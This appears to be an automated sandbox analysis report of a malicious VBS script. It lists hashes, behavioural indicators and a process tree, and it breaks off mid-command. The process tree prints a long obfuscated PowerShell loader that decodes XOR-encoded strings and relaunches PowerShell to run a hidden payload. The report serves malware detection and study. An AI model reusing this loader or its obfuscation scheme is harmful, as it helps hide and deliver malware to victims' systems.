Analysis
max time kernel: 31s
max time network: 33s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64 arch:x86 image:win7-20230220-en locale:en-us os:windows7-x64 system
submitted: 08-03-2023 11:23
Static task: static1
Behavioral task: behavioral1
Sample: 0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f.vbs
Resource: win7-20230220-en
Behavioral task: behavioral2
Sample: 0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f.vbs
Resource: win10v2004-20230220-en
General
Target: 0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f.vbs
Size: 642KB
MD5: 791f78299b068e26b702b1b0c54c0417
SHA1: 461c4a70f8a083e3565816161eeaabd1bdaf6592
SHA256: 0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f
SHA512: 3826229f02637b703440f8f51856ab61ee515a28902777ec505d92603a3a752361f0c0d6223f51c30b4a5484de65cb3b08f414ba38c41a0d3b31738d97e7b8a2
SSDEEP: 12288:zt9mMykiZo+FxNsUV7oBvwQzpBKtPN/B9AzZHDl:znutoxNTMx8zZHZ
Malware Config
Signatures
Blocklisted process makes network request (1 IoCs)
flow | pid | Process
2 | 1992 | WScript.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
1696 | powershell.exe
1516 | powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1696 | powershell.exe
Token: SeDebugPrivilege | 1516 | powershell.exe
Suspicious use of WriteProcessMemory (7 IoCs)
description | pid | Process | procid_target
PID 1992 wrote to memory of 1696 | 1992 | WScript.exe | 28
PID 1992 wrote to memory of 1696 | 1992 | WScript.exe | 28
PID 1992 wrote to memory of 1696 | 1992 | WScript.exe | 28
PID 1696 wrote to memory of 1516 | 1696 | powershell.exe | 30
PID 1696 wrote to memory of 1516 | 1696 | powershell.exe | 30
PID 1696 wrote to memory of 1516 | 1696 | powershell.exe | 30
PID 1696 wrote to memory of 1516 | 1696 | powershell.exe | 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b6c8776a31b8d3bea3c5b01e835974eab61a28ceef2661f375493620918c56f.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID: 1992
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Togets = """MFUu nBc t i o n CK e l t insTk 0 V{I l PpraMr aDmP( [PS tUr iEn g ]A`$RRTeSjAe hUo p pMeUnCeMsS) ;F G S`$ KSuclAtAuGrBa k t i vPiMt eVt s =B N eSwU- O b jPeAc tC AbCyKtMe [O]C ( `$FRAeRj elhPoLpSp eSn eus .FL eUnTg tFh / 2 )K;b O T F oPrH( `$ PTaSc hEy dLeGrMm a t oIuBsOlSyA=B0 ; S`$SPua c hUyRdGe rAmSaPt o u s ldyR - l tk `$MRBeTjPeShNoEpPpCesngeEs . L eZnTg tTh ;S `$ P a c hSyRd eVrFm a tCoSuUsSl yM+ =k2B) {M H L`$sPTe r i e s oPpSh aPg eSa lT N= K`$ RBeCjLeCh oEp poeIn eSs .DS uDb s t rSiRn gD(C`$TPBa cBhMyCdCeAr mTaMtQo uPsKl y ,s D2O)M;T R E S M h C `$ K uPl t u rUaFk t iSv i tCe t sC[G`$ PPaTcCh y dVeBrCm aUtPo uSsWlTy /Y2S] K=B D[ cmo nBv e r tF]R: :CTUo BGyBtReO( `$ PMe r iFe sso p h aAgie aSlH, 1R6T)K; L`$tKguHlMt uArSa k t iHvHiHt eCths [ `$SPaa c hUy dPe rDmHa tCoTu s lBy /K2S] s=D Z(U`$SKTuMl t uArPa kKt itvTi t eStSs [P`$sPUaAcOh y dbe r m a tSoCuDsRl y / 2K] - b xMoErC M1R9K7B)b;H J T C }A T[DSEt rui n g ] [uS yDsCt eUm .GTVeSxFtS.HE nDc oPdBiMn gF]E: : ASSTCII IE.TGBeGtUSBtKrNiRnPgU(N`$FKSu lZtOuFrFaBkStKiGvFiItGeGt sP) ; } `$ePFuDrOiHv sEiOgWtHe 0I=dK eElTtBiIsIk 0 'B9C6KBCC BC6HB 1 A 0 AA8PESB As1 AA9FAK9 'm; `$AP u rAiPvOsPiPgbtKeA1p=AK esl tGiPsbkM0 H'M8S8FA C Ab6fB 7MAHARB 6PABAKAC3 BA1 E B 9 2AArCLATB Fc6HF 7ME Ba9 0IA BpBN6 AO4SA 3tAK0P8UB A 4 BA1PAaC BM3KAT0 8 8AA 0 Bu1DABDSAVA AR1eB 6C'L; `$EP uWr iSv sPi gUtAeD2C=TKSe l tRiUsIk 0 F'k8U2 Ab0NBR1t9J5CB 7UAHA Ap6s8V4 A 1 AL1 B 7KAR0 B 6 BT6T' ; `$ P uTr iMvUsJiCgWt eU3 = K e lStSi s kS0T C'T9B6IBCC B 6 BW1MA 0 A 8SEKBK9 7TBC0EA B BV1VA C AI8 AC0EEAB 8BC AfB Bs1TAO0SB 7SApATB 5 9 6GA 0ABg7 B 3 ALCSAD6IA 0 B 6IE B 8 D A 4SAkBAAG1QAc9TAN0P9B7 AB0TAC3 ' ;T`$ POu r i v s isgBtWe 4 = K e lMt iEsPk 0U 'CB 6TBC1PB 7NA CSAtB A 2C' ;R`$FPIu rsiMv s iIg t eR5T=TKSeSlTtFiDsFkF0S 'A8 2 A 0SBP1B8 8GApAAA 1 B 0 A 9BA 0 8KDFAn4HA B AP1HA 9 AF0 'K;S`$ PMuArLi v sWi gKt eD6 =SKBe l 
tPiKsSkM0 'F9 7D9S1 9P6 BR5RA 0 A 6PA C AS4 A 9 8 BSA 4LAG8SAE0PES9 ES5 8HDTA C AP1 AS0C8 7SBVCO9U6 A C AA2 EA9 EF5M9I5 BB0 A 7 AP9BABC A 6 'T; `$ P uarHiUvOsPi g t e 7K= K eBlGtsiSshkT0D 'T9k7KB 0GA B BK1 A C AG8AAL0LE 9SE 5 8J8DA 4 AVB A 4SAT2PAI0SA 1 'M;U`$ PMuhr i vRsDiggHtFe 8R=IKPe lCtSi skk 0S Y'W9S7 A 0DAL3 AK9OAF0NAN6ABD1 AF0 A 1U8D1tAG0 A 9 AR0KA 2MA 4SBH1UAS0A'R;s`$ZPHuSrDiSvPsDiSgMt eR9 =NKTe lFt i s kc0 L'B8LCWA BF8o8 AS0LA 8DAHAUBT7 B C 8 8CARA AF1OB 0PAJ9HA 0 ' ; `$ A pCo lFo gCyA0B= KUe lTtTi sTk 0T ' 8o8 B C 8T1KA 0nAH9NAO0 AD2SAP4DB 1TAC0A9L1KBUCOBA5 A 0r'F;A`$ A pAo lDoFgHy 1 =GKDe l tNiKsMkT0S 'D8 6 AU9RAd4 B 6 B 6 E 9REF5K9 5 BU0 A 7MA 9NAACSAM6MES9OE 5 9R6 A 0SAO4 A 9VA 0 AR1FEA9 ET5T8H4SAsBIB 6 AACP8 6 A 9 A 4 BA6OBP6aEg9 ED5P8P4 B 0BBC1SAPAG8 6PA 9 AT4ABb6KB 6T' ;A`$PA pDoAl oHgIy 2 =LK e l tHi sAk 0B T' 8DC A BBBA3 AFACA EiAC0 'L;s`$RA plo lWoFgSy 3B= K eDlBt i sfk 0P 'I9a5 B 0FAE7 A 9BAVC A 6tEM9 E 5 8MD ASCPA 1RAA0 8s7ABKC 9M6 A C AE2 E 9 ES5L8UB AU0 B 2K9S6GAO9 A A Bk1 E 9NE 5A9K3 A CCBB7KBV1BB 0CAJ4 AR9W'P;b`$AA pSoZlFo gSyu4F=SKUeSlGtHi sPkO0 'R9F3DA CNBk7 BL1IBC0HAI4TAA9S8K4IAG9 A 9MAUA A 6P'O;R`$FA p o l o gPy 5 =WKBeDlAtRiFs k 0P 'GAABTB 1 AM1IA 9PAT9B't;R`$HAMpRoHlSo gTy 6 =SKPe l tDi svk 0O t' 8TBmB 1 9P5 BF7 A A BS1FA 0CA 6aB 1S9U3CA CCBT7 B 1 B 0NAW4FA 9T8S8 Am0EA 8UAKASBT7TBSCB' ;F`$ ARp oClRo gBy 7 = K e lStLiLslku0c P'S8 CC8P0 9 D 'A; `$ Alp oNlFo g yL8t=AKBe lAtAiBs kK0 ' 9A9 'I;S`$ CSaPr i nTuPlRaDtGe =RK eBlTtSiasFk 0E C'N9 0K9 6I8 0 9 7 FJ6NFT7 'F; `$ J e r oLpSi gCaN=PKSeVlItri sBkV0 ' 8U6VA 4LAP9UA 9 9 2LACCyACBDA 1HANABB 2F9 5LBD7NA A AP6a8K4 'S;gfUuRnbc t iSo n Ff kIpT P{HP a r a mH T(N`$ EEn dUaRnBg eHrYsG,M `$ M iBnKiCo nClAyC) H P S F ;V`$sF iBrFmFaLf lKa sAkFehr 0E =eK eSl tSiMsAkT0J M'BEP1SABEKA A ALB AA6 A CBBD5 A 0RBp7 ATCSADB AM2 Ag0 A BSBv6NE 5 F 8 Em5 E DF9 E 8O4SB 5EB 5E8 1UA ABAE8 AS4 ACC A B 9B8DFPF FKFT8P6 BE0 B 7 BM7sAB0LA B BF1 8 1 APApAA8FAO4CAICgABB EpB 8K2CAC0aB 1F8U4 B 6FB 6 AS0OAs8dAK7AA 9 
ABCMAS0AB 6TEFD EBC ED5ABF9 EF5 9R2 ASD A 0NB 7 AS0SEP8 8RA AF7 A F A 0NA 6IB 1PE 5 BFEEE 5TE 1 9 A E BG8 2NAB9 ABA AU7 A 4 Ai9F8I4 BS6FB 6 A 0 A 8MAC7SAG9UB C 8 6TAf4SA 6 ADD A 0CER5BEa8J8E4BATBFAR1AES5TEJ1P9YAOEFB 8H9 ATA AB6 A 4 BD1FAGCAAPA A B ETBD9D6 BS5 AA9FA CABv1AE D EU1 8 4IBA5 A A AC9UABAMA 2NB C FLDSE CE9 EGE 8WFt4 9 8 E BS8 0 B 4AB 0WAB4 A 9SBA6AEBD EO1 9c5 Be0 Bt7SAgCABH3DBD6 A CAAT2tBK1TA 0WFD5 EUCSET5PBD8BEFCRE Br8M2iAS0 B 1 9 1 B CABD5HAA0EEtDEEU1c9N5VBU0CBS7AASC Bk3 BS6 ASCNAI2 BA1 AK0 F 4RESCE'N; &A(T`$ AdpCo l oVgDy 7 )S `$ F i r m a fRl aKsEkBe r 0 ;S`$ F iUrRm a fSl aTs kseVrL5 =H SKTeEl t iUsRkT0 ' EA1L8TDSAN4EBT1BA 6PA D E 5SF 8 EC5VE 1 AUEDACAFAIB AS6TA CFBM5 AH0OB 7 ABCeAWBDAe2HAT0 A B Bm6KETBS8 2TAc0 BK1 8O8 AT0UBs1iA D A APAA1 E D EQ1B9C5 BK0 BD7BA C BV3 BK6 A CFAA2LBF1 AV0HFN7UEP9 E 5N9SEV9 1 B C BS5FA 0 9 ET9U8 9B8LE 5 8c5 ERDAEU1Y9 5 B 0 BF7 AHC B 3RB 6UASCCA 2NBG1 AG0 FF6 E 9 Eu5 EK1l9 5 B 0 BP7WA CNBP3RBR6 A CBAU2 B 1LAp0sFT1SEqCEE C 'R;c& (I`$TAep oVlBoPg y 7 ) l`$ FSi r m aFfhl a sAkBe r 5 ;s`$ FPi rTmGa f lAa sBk e r 1S G=C TKBe lUt i s k 0S A'LBD7KAD0 B 1MB 0PB 7AA BDEU5 Eb1 8KDVA 4PB 1EA 6lA D EMBU8ECMA BFBA3NARAaASESAS0 E D Eu1pApB B 0AA 9UAO9AEO9 EH5f8 5TE DL9AEE9S6DB CBB 6RBV1PAS0 Am8nEmB 9 7 BR0FA B BR1 ACCbA 8 A 0LEAB 8nC AVB B 1rAK0SB 7CAUASB 5P9 6 A 0 B 7MB 3DABCUA 6 A 0 BP6 EKBS8HD AS4PA B A 1OA 9 AR0 9I7 AI0NA 3S9R8 E Ds8 BEAE0 B 2 E 8 8UA AE7cA F At0SA 6 BS1 E 5U9U6tBVC B 6FBD1RAS0IAP8HETB 9 7nBM0GA BHBS1 APC AS8PAO0 E B 8 CkA B BF1 AU0TBP7CAGA BL5I9m6 AB0 B 7 BE3JA CBAL6FA 0FB 6 E BS8 DUA 4EAaBUA 1FAV9MAF0S9T7 Ao0 A 3 EAD EpDP8BBRAO0ABg2 EK8 8NASAA7EA FPAE0CA 6 BA1 E 5H8TClAPBFB 1 9 5SBP1SB 7 EsCFE 9LEO5VEaD EM1RAHEDASAFANB A 6IASC BB5SA 0 Bd7EAGCDADB A 2oAM0DARBTB 6 E B 8 2 AC0 BM1M8M8 AH0mBT1TASDnA AHAB1PE D E 1P9F5RB 0RB 7SA CPBE3VBN6 A C AB2 BS1BA 0 F 0 E CCESC EOB 8SC ASBPB 3MA A APEaA 0TE D ES1 ARBRB 0ZAH9 AB9 EE9RE 5F8 5GETD EP1H8P0CAGB AU1 A 4OASB A 2 AU0SBM7AB 6MEHCSE C EuCEE CCEE9LEN5REI1V8A8 A CSA B A CBAFA 
A BPAS9SBNCKE CSEOCt'c;C& (U`$ AKpBoAlaoNg yC7 )L A`$ FPiBrdmhaSfIlPa s kTeBr 1O; }Pf uUn cLt iMoFnH GeDNTW { PGa r a m (S[EP aIrBaIm eUt e r ( P oMsHiPt iEoWnU G= 0V,R EMFaKn dlaZtVoSr yS B=R `$ TCrSuFeK)S]S L[HTAyRp eF[D] ] I`$IFMoMrUeBhBoSo kP,Y[ P aArKaWmPe trePr (SPRoVsUi t iAoTn S=S 1B)d]A U[hT y pNeT]M `$SEAk sTpHoSs e e r = A[ VMoAi d ] )V; `$NFDi rUmEaAfSlcaSsRkLeDr 2C =G K eAl tFi sUk 0 'NES1 8 4TA 3 B 6bB 1KAKCEBP3TALBIA C ASBBA 2IBC6 B 1RA 8MA 8 AH0VB 7OBC6 EE5HFR8lEC5 9AE 8 4 BM5 BD5 8k1 AsABAF8 Ab4uA C AHB 9p8 FDFVFaF 8 6fBH0wBS7 BA7GAt0 A BEBB1L8O1AAUA A 8UAA4SADC A B EPBD8 1 A 0TAW3 A C A B AB0c8 1 BPC AHBSAG4 AB8ZA C AF6d8D4 BS6TBS6RA 0 Ah8 AC7FA 9 BHCuEKD ESDN8 BKAE0SBP2CE 8B8AA AD7SAFFRAZ0BAS6IBB1 EK5E9 6 BpC B 6MB 1sA 0SA 8PETBO9 7FAN0 A 3 A 9 AW0AA 6HBS1 A C A A ASBDE B 8H4SBD6JBB6 A 0 AL8 Ao7 A 9MBECA8HB AP4DAE8FA 0 E DvER1U9k5 B 0DBU7 A C B 3 B 6 A CHAf2TBm1PA 0sFMD E C E CSEL9fE 5B9CE 9S6iBSC BD6SBR1 A 0PAJ8KE BE9L7 AL0 AM3FAA9UA 0SAP6 B 1 ALC ASA APBCELBp8E0 AM8WA C B 1 E B 8C4 BO6 BA6 A 0IAc8SA 7 AC9TBPCF8J7 B 0 AAC AK9 AT1UAK0FB 7 8 4 AC6FA 6 Av0TB 6 BW6 9N8 FLFGF F 9S7EBC0 APBREOCbEcB 8 1RAF0 AS3RAMCKA BPAS0C8 1SBTCCAFB A 4 AM8SAPC AA6 8 8TA ABAV1KBT0 A 9xAT0IEID E 1S9 5 BS0 BE7 ASCMBT3 B 6CACC A 2SBA1FAH0 FMC E 9GEV5AE 1 A 3BAD4hAU9 BK6SA 0 ETCRE B 8S1 AU0CA 3PAGCIAKB AT0C9 1ABACCBh5 AD0PE D E 1T8s4 B 5 ADASAB9IAKAEA 2ABNCmFF5CEC9JEI5 EH1 8 4SBM5BAGA A 9TA A A 2KBiCSF 4 E 9HE 5 9SE 9G6 BTC B 6ABO1sAT0FAD8 ECB 8 8 BN0FAP9SB 1MATCDAM6tAI4TBV6TBC1S8D1 A 0CAE9bAS0 AR2 A 4 BK1MAT0 9D8 ESCA' ;P& ( `$BATpPoIl oOgBy 7 )B U`$PFAiJr m aBfBlMa sUkKeFrF2 ; `$VF iSr meaffFlKa s kEehr 3 G=A K eIl tUiUs kT0 ' Ef1U8R4gA 3SBP6SB 1OA C BT3TALBTA C ASBUAM2BB 6CBM1 A 8 A 8SAU0RB 7 BP6DEKB 8S1AAF0TAA3IA CBANBLAS0K8 6GA A AVBBBN6 BS1 BL7MB 0CA 6fBI1OANADBC7 EFDCEs1 9 5RBS0 BS7MA CLBS3LBS6bAICGAS2UB 1 A 0BF 3 EN9JEA5P9 EF9 6TBcCAB 6 B 1PAs0 AG8RE B 9 7RAD0 AK3 A 9 Ae0 AI6FBR1CACCBAFALAPB E BT8O6 AB4 A 9 AR9 ASC ARB AS2T8S6GA AEAVBDBF3NA 0 APBIB 1 AVC A ASA B 
BF6s9 8CFFFEFTFH9F6 BB1kAA4HAUBCAT1GA 4PBK7BA 1IEs9REJ5 ES1S8S3 A A BS7tA 0KA D A AFATA AGEBEWCSEPBM9 6 AL0 B 1L8DC A 8IB 5UAL9DA 0NAD8TAT0FA B B 1WAS4DB 1VAUC AMASASBW8B3 AA9 A 4MAU2OBS6 E D E 1p9 5ABV0UBF7PATCEBT3FB 6RASC A 2EBM1 AS0 F 2AE C ' ; &L(F`$PACpeoPlmo gPy 7C)S `$ Fsi rIm aSfElNaRsHkReAr 3S;R`$HFSiRrAmIa f l a s k eMr 4D =L pK e lKtTiGsSkN0 G'ME 1A8C4 AI3GB 6KBP1FAFCOBK3MABBSA CAA B AR2tBV6 BV1SA 8 AA8NA 0 B 7PBf6 EPBS8S1SA 0 AE3SAJC AiBCAP0C8 8CA 0OBB1SAJD AsA AU1LE DpEC1F8 4FBa5 ABAeAK9DA ABAM2 B C FF7bES9AE 5 E 1K8 4TB 5 AMABAH9CA A A 2fB CCF 6 E 9GE 5UER1D8p0UA E B 6MBR5NAUA B 6IAM0 A 0TBA7IE 9 EA5fEF1 8A3RA AbBS7DAU0CA D AEAMA ASAUEGE C E Bc9R6BAG0mB 1I8 C AU8IBB5 AA9IAK0SAE8SA 0AAtB B 1TA 4 B 1FAACIA ALAbB 8 3VA 9SA 4SAR2TBh6 ETDRE 1K9S5DBG0RB 7KA C BK3UBE6 AFC A 2DB 1SA 0DFO2vE C 'U; &t(S`$ Agp oSlso gSy 7 ) `$RF i rSm a fBlFaCsRk e rA4 ;H`$ FAi rBmGaCf lAa s kCe r 5 P=U GKPeSlDtAiOs kM0 N'BBh7TAa0 BV1 BR0 B 7 AsBtE 5PES1 8 4 Ab3DBT6KB 1 AaCSBR3 A BLAPCLAABEA 2aB 6BB 1PA 8 AI8SAm0 BE7SB 6 ESBN8S6 B 7 AS0BAP4SBB1AAV0G9 1 BBC Br5SAL0CEPDpE C 'M;L&H(C`$ A pTo lGoVg yC7F) `$KFbiSrSmUaTfAl aRs kHeprJ5 I;S} `$TA uetVoUnSoRm iUsKe rGeUt S=S FKDeOl tdims kA0 ' A EBAB0 Ba7sA B AS0KAK9 Fd6 FM7 ' ;F`$LF i rRmAagf l aUsbk eSr 6A G= SK eBl tDiDs k 0 'NES1 9U1NAc4 AG9 AA0 B 1 ASCQAP1UAB0 AABTBF6PEX5BFC8OE 5 9 EK9 6RBHCEBC6 B 1dAR0TAP8FE Bu9P7IB 0EA BcB 1AA CuAT8FAH0REBB 8cC ADB BB1TA 0 BG7 A A BL5b9P6SAM0 B 7sB 3eA CEA 6SAP0PBt6 E B 8A8 AS4UB 7AB 6 A DhAI4UAF9E9 8 FBFrFBFR8 2 AD0mBh1 8P1 AN0 AA9TA 0RA 2RAN4SBE1BAP0w8C3FA ABB 7E8E3GBB0TA BlA 6IBA1 A CKAFA A BJ9 5 A ANAEC AEB BK1HAU0SBF7SEBDTEwDUA 3BARE B 5 E 5tE 1 8F4 B 0 B 1TARA AFB AOARAD8DAsC BT6CAE0 B 7AAA0LBP1CEB5 EF1m8S4 BS5 ACASA 9VA A A 2HBCCUFF1UE CCE 9 EB5 ELD 8T2L8 1 9 1MEG5M8P5 E D 9sE 8 C APB BU1J9F5PB 1DB 7G9 8 E 9MES5 9SE 9 0C8 CHA BBBU1SF 6FFV7B9Z8hE 9aE 5R9DEP9O0 8TC ADBPBE1SFW6 F 7 9w8ME 9 E 5 9UEF9 0 8fC ABBRB 1SFR6 FV7F9 8 ELCOEE5VELD 9sET8 CBACB B 1F9 5BBU1 Bc7 9B8 E CBELC E CB' ; & (M`$ A 
pPo lfo gFyS7d) G`$GF iKrFmLa fMlUaFs k eerO6U;F`$ SGk nSnFecs t eK =Y SfPk p N`$BAPp oSl oBgUyB5k S`$UA p o l oMgFyM6 ;D`$yFFi r mAaSfTlMa sZkSeNr 7 F=K FKKeKl t iSsIkU0K S' E 1 9 6MAS6PBk0 AO9BBE5 Bd1 BT0PBS7OA 0sB 6RB 4 BA0 Ak0DA 9 BRCSF 6KEk5 F 8UEP5HEN1R9 1 AN4HAA9DA 0 B 1 ATCBAR1 A 0 AkBCBP6 E B 8GC AUBBBS3 A AfAAESAE0OE DP9 ED8aC AHB BH1H9 5 BB1PB 7B9S8oFdFSF F 9 F A 0AB 7FABA E 9 ET5KF 3 F 0 FP1 ES9SEO5 Fd5BB D FG6AFP5 FV5 Fs5SEj9 ES5 F 5IB DFFI1 F 5SE CC' ; &R(A`$AAEpFoml oIgPyI7P)h `$TF iArCmTa fSlOaFsBkBe rK7A; `$ FTiOrmmBa f lPaAsCkbe r 8C O=N BKHe l t iRsPk 0 M'RE 1 8P7 A AEB 1TA 4SARBNAAC BR6 A 0sB 6RED5VFT8GE 5OE 1P9 1AAB4 A 9 AR0 BT1NAKC AP1 A 0 ApBSBR6 E B 8sCSA BgB 3 APADA ETAN0 E DM9SET8 C ARBFB 1K9S5TB 1IB 7 9T8 FaFSFNFS9SFcAA0HB 7CA ATES9CEa5SFJD FU1 F DBFPCCF 6UFB3MF C FA3 EA9ME 5BFT5 B DPF 6 F 5FFR5dFd5 E 9KE 5dFC5 BsD FP1bE C ' ;B&R( `$ AFpLoSlKo gEyD7 )n T`$PFRi rPmsaGfRl aTsCk eTr 8L; `$pS c uDl pBt u rGe s q uKeIl y 0E0F=V' H KjC U : \FA d eHsUtDeT\RSFa lKtLeCtNs 'H;M`$ SQcOuSlIpOt u r eIsLqTuIe l yH0 1U C= K e lRt iCsPk 0 K'SES1G9A6 BF0CA 9 BL1 AS0 B 6ABO1 BD7SAs0UA FOA ENAS0 BF7 A BPA 0FFS8NEdD 8 2PAS0SBC1AED8 8 CFBO1 AI0 A 8 9 5 BA7PASAIB 5lA 0SBB7 B 1 BACSE 5PEL8A9 5 AM4FBg1iA DRE 5 E 1 9B6OAm6KBK0 AU9 B 5 B 1 BT0HBS7 A 0EBS6BBB4 Bh0AAK0KA 9PB CDF 5 FK5 EmC EBBA8S0AAA3oBP1LA 0UB 7 BM0 A 1 AB1TA 4 AHB ATB AB0O'F; &H(U`$ AHpUo l oWgsyG7S) `$ STc uklspPt uMr eMsOq uEeLl y 0 1 ;A`$ FFi r m aPf lTa s kSeNrL9R =U KOe lPtKi s kR0O A'RES1N8N3HA CDBL7FAU8 AV4 AE3 AD9 A 4 BI6 A EAAP0 BR7 EF5SF 8 E 5T9PEB9 6 BKCABK6MBU1RA 0 A 8 E Bd8 6KAdASAKBSB 3 A 0SB 7 BR1D9A8HFKFSFKFC8m3BBD7BAPAeAi8 8E7 A 4 B 6sA 0 FA3CFS1 9O6 BH1 BB7 AKC ANB AF2LE D E 1O9s6 BU0 A 9PBv1 A 0FBM6 BB1TB 7EA 0 ABF ACE AT0KBS7 AoBKA 0 ECCE'P; & ( `$ A p oYlTodgSy 7M)P C`$ F iIrUmCaAfSlBa sRk eCrL9U; `$ SSu l t eEsCt rFe jAkUe rOn eT0M F=M RK eFlCt i sSk 0U k'B9UEL9 6BB C B 6DBD1aA 0fAC8AETBC9 7SBF0PA BUB 1DAAC AH8SAB0 E BD8SCKA BdBD1cA 0UBH7TAPAsBP5P9 6 AI0UBS7 BF3TAUCMA 6HA 0DB 
6BEDBL8e8 AD4DB 7LBB6HAUDSA 4FAE9R9 8 FUF FVFF8 6CA AIBD5SB CHE D ES1 8S3SA C B 7CAA8SAA4PA 3 A 9WAC4AB 6pA E A 0HB 7SE 9 ES5 FZ5GEF9 E 5 ED5 EZ1 9S6TA 6 BC0UA 9 B 5ABU1RB 0 B 7 A 0KBD6EB 4CBl0 AS0 AR9UBMC FP6GE 9PEs5BF 3oF 0GFR1SEECD'L; &g(I`$ A pSoMl o g yU7 ) p`$NS uSlDtMe sUt rCeHjLkEeErrnDeU0D; `$CAPpOoelBoAgLiSzfenrA=P`$JF iMr mSa fHlGaMs kPe r . c oBuGn tb- 6 5r4K;P`$FSFuMl tTeUsCtNrDeMjVkBeRr n e 1V S=O SKpeAl t iCs kA0F 'f9 EP9T6 B CHBU6 Bo1 AM0 AF8FELBR9 7 B 0EAeBEB 1FASCSA 8 AC0aEBBr8FCBAPB BL1 AM0 BO7SABA B 5D9S6 A 0SB 7 BT3 A CiAO6 A 0 BS6DE B 8 8HAs4SBA7PBS6HA DsAK4SA 9B9 8NFFFKFXF 8 6BADA B 5 BeCBESDHES1C8B3dARCCB 7 Al8HA 4 AM3 A 9MAU4pB 6TA EkAh0 B 7 E 9HEU5 FI3DFD0SFD1REB9 EI5VEM1 8 7MA ATB 1VA 4GASB A CSBG6RAp0 B 6 EA9sE 5GE 1H8S4BB 5 AFADAT9SALAsAN2FACC BTF AD0JB 7CEECB'S;K& (c`$ A pMoPlAo gUyB7G)D a`$LSRuNlCtFe sDt rVe j k e r nCeN1 ; `$ SHu lgtMe s tRrPeRjEkBe rHn e 2e M=B KTeGlAt iFsRk 0 B'KE 1M8F4 B 6 BLC AF8 B 5 B 1aAPA Bd1 AK0 A BABM6 E 5SF 8 EB5 9UE 9 6fBPC B 6LBO1 AM0KAP8 EDB 9U7GBP0KA BFB 1 A CRAJ8tA 0 ELBS8DC AOB BC1IAH0 BE7aADAUBL5 9 6 AK0AB 7 BH3RA C At6WAT0 B 6FEABf8P8 A 4 BF7 BB6kABD AS4UA 9 9 8BFjF FVFA8Q2KAz0BB 1V8 1 AE0PAC9SAD0 AV2 A 4 Bf1 AR0 8 3FA AMB 7 8S3HB 0BAFBSA 6OBP1 AUC A A AFBS9A5 AMA AsCEASBPBl1iA 0LBS7 EGD E DFAA3 AgEBBD5 E 5ME 1 8 6IAi4 B 7WASC AHBBBB0 AG9DAT4CB 1PA 0OEF5 EC1W8 F AP0OBE7 A A B 5UA C Au2 A 4MERCTES9CED5 E DG8 2G8B1L9 1PE 5 8 5 E DN9 EB8TCSA B BN1P9P5SBB1CBK7D9 8EE 9 EE5 9EEK8MC AVBBBB1C9 5 BS1PB 7F9 8 EA9oES5 9BE 8 CFA BEBb1 9 5bB 1 BU7P9V8mE 9 EV5C9HE 8UC A BMB 1 9C5UBK1BB 7 9G8TE 9AE 5b9 E 8SC ASB B 1S9S5zB 1 Bp7 9 8 E CMEC5HE DI9 ES8NC A BVBH1P9T5 B 1 B 7P9 8FE CNELCsEVCh'g; &h( `$aASpQoRlZoNgByT7 )c O`$ SSu lFtRe sFt r e jFkAeTrcnMeK2P;K`$SSPuNl tre s tBr e jSkIeErEnVeU3L = KSeWl t iKs kS0H P'SE 1P8N4 B 6TBDCUA 8UBS5 BS1 A A B 1HA 0GATB BE6PETBH8 C A B BP3KA AAACECAF0 EsDFES1 9F6 AG6SB 0FAu9 B 5 Bm1ABF0FB 7UAc0RBC6oB 4 B 0 AG0MAC9UB CUF 6fE 9SE 1A8 7BAMABB 1SAs4 A BPAsC BU6 AR0VBL6UEA9 EV1 9D6 A E 
ACBAASBFAM0rBB6LBB1SAE0 ED9MFD5NE 9GFu5 E CJ' ;A&i( `$oARpBoSlpoGgsy 7 ) `$mS u l t e sDt rSepj k e r n eT3 #G;""";;Function Sultestrejkerne9 { param([String]$Rejehoppenes); For($Pachydermatously=1; $Pachydermatously -lt $Rejehoppenes.Length-1; $Pachydermatously+=(1+1)){ $Keltisk = $Keltisk + $Rejehoppenes.Substring($Pachydermatously, 1); } $Keltisk;}$Manak0 = Sultestrejkerne9 'L A F V S t T B G I EBX ';$Manak1= Sultestrejkerne9 $Togets;if([IntPtr]::size -eq 4+4){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Manak1 ;}else{.$Manak0 $Manak1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1696
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Keltisk0 { param([String]$Rejehoppenes); $Kulturaktivitets = New-Object byte[] ($Rejehoppenes.Length / 2); For($Pachydermatously=0; $Pachydermatously -lt $Rejehoppenes.Length; $Pachydermatously+=2){ $Periesophageal = $Rejehoppenes.Substring($Pachydermatously, 2); $Kulturaktivitets[$Pachydermatously/2] = [convert]::ToByte($Periesophageal, 16); $Kulturaktivitets[$Pachydermatously/2] = ($Kulturaktivitets[$Pachydermatously/2] -bxor 197); } [String][System.Text.Encoding]::ASCII.GetString($Kulturaktivitets);}$Purivsigte0=Keltisk0 '96BCB6B1A0A8EBA1A9A9';$Purivsigte1=Keltisk0 '88ACA6B7AAB6AAA3B1EB92ACABF6F7EB90ABB6A4A3A08BA4B1ACB3A088A0B1ADAAA1B6';$Purivsigte2=Keltisk0 '82A0B195B7AAA684A1A1B7A0B6B6';$Purivsigte3=Keltisk0 '96BCB6B1A0A8EB97B0ABB1ACA8A0EB8CABB1A0B7AAB596A0B7B3ACA6A0B6EB8DA4ABA1A9A097A0A3';$Purivsigte4=Keltisk0 'B6B1B7ACABA2';$Purivsigte5=Keltisk0 '82A0B188AAA1B0A9A08DA4ABA1A9A0';$Purivsigte6=Keltisk0 